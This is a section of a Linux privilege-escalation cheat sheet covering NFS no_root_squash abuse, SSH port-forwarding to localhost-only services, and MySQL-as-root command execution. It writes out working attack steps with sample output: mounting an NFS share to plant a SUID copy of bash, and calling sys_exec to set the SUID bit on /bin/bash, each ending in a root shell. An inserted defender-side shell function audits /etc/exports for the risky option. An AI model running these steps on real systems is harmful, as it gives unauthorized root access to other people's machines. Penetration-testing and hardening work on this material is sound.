NFS & INTERNAL SERVICES

NFS no_root_squash

Root on NFS = root on target — Copy /bin/bash onto the share and set the SUID bit

cat /etc/exports
If no_root_squash: mount share, create SUID binary
Example Output
cat /etc/exports
/home/backup *(rw,no_root_squash)

On attacker:
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

On target:
/home/backup/rootbash -p
# whoami
root
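
Defender-side check for the condition above, added here as an example (not part of the original cheat sheet): a POSIX sh function that parses an /etc/exports-style file and reports every client entry that carries no_root_squash. The sample exports content below is constructed for the demo.

```shell
#!/bin/sh
# audit_exports FILE
# Prints "SHARE CLIENT" for each client entry exported with no_root_squash.
# Returns 0 when nothing risky is found, 1 otherwise.
audit_exports() {
    file=$1
    found=0
    set -f                                   # no globbing: '*' is a client spec, not a pattern
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line%%#*}"                   # drop comments
        set -- $line                         # word-split: share, then client(options) tokens
        [ $# -lt 2 ] && continue             # blank line or share with no client entries
        share=$1; shift
        for entry in "$@"; do
            client="${entry%%\(*}"           # client spec before '('; '*' means any host
            opts="${entry#*\(}"; opts="${opts%)}"   # options inside the parentheses
            case ",$opts," in
                *,no_root_squash,*) printf '%s %s\n' "$share" "$client"; found=1 ;;
            esac
        done
    done < "$file"
    set +f
    return $found
}

# Constructed sample exports file for the demo (not taken from a real host).
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
# backups: root squashing disabled for every client
/home/backup *(rw,no_root_squash)
/srv/www 10.0.0.0/24(ro) 10.0.0.7(rw,no_root_squash)
/srv/pub *(ro)
EOF
if audit_exports "$tmp"; then
    echo "no shares disable root squashing"
else
    echo "fix: drop no_root_squash (root_squash is the default) or restrict the client list"
fi
rm -f "$tmp"
```

The function only flags the option; remediation is to remove it (root_squash is the exportfs default) and re-run exportfs -ra, then re-check the live export list with showmount -e.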

Internal services

Services bound only to 127.0.0.1 — Unreachable from the network but may be vulnerable; forward a port to reach them

netstat -tulnp
ss -tulnp
Example Output
netstat -tulnp
127.0.0.1:8080  python3  <- internal web app
127.0.0.1:3306  mysqld   <- internal MySQL

SSH tunnel to access:
ssh -L 8080:127.0.0.1:8080 user@target
Browse: http://127.0.0.1:8080 on attacker

MySQL as root

Database running as root — A UDF (User Defined Function) that runs shell commands then executes as root

mysql -u root -p
If root: SELECT sys_exec('chmod u+s /bin/bash');
or UDF exploit
Example Output
ps aux | grep mysql
root  1234  /usr/sbin/mysqld
(MySQL running as root!)

mysql -u root -p
SELECT sys_exec('chmod u+s /bin/bash');

bash -p
# whoami
root